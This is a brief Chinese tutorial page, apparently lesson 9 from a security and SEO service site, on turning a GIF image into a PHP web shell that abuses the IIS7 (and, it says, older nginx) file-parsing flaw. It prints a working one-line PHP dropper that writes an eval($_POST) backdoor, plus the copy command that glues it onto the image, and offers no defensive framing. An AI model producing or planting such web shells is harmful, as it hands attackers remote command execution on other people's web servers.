大连,网络安全,信息安全,防黑客,SEO,搜索引擎优化,网站防黑,网站被黑处理,系统安全,企业安全,信息技术,web开发,数据库,网络技术,windows,linux,网站建设 就找QQ:48011203

第9课制作图片一句话iis7解析漏洞利用

copy复制

1、准备php一句话或者可执行脚本一个。
2、准备图片一张。

a.gif正常图片 1.php一句话木马<?php fputs(fopen('./a.php',"w"),"<?php eval(\$_POST[a]);?>")?>

使用copy命令
copy a.gif/b+1.php/b c.gif

得到图片木马c.gif


剩下的自己看看吧。

不只IIS7,NGINX 1.0以下的也可以。

http://wenku.baidu.com/link?url=L1r_jge8kKnV8ldUyzi-QbZotAv3aZofoO7So5fANUvMtSpDaTto_bl6c-a0FB2SS14O3wqFvGJCLg4HFpgKyob6t5h-RCZFjHbpq0XY59W

评论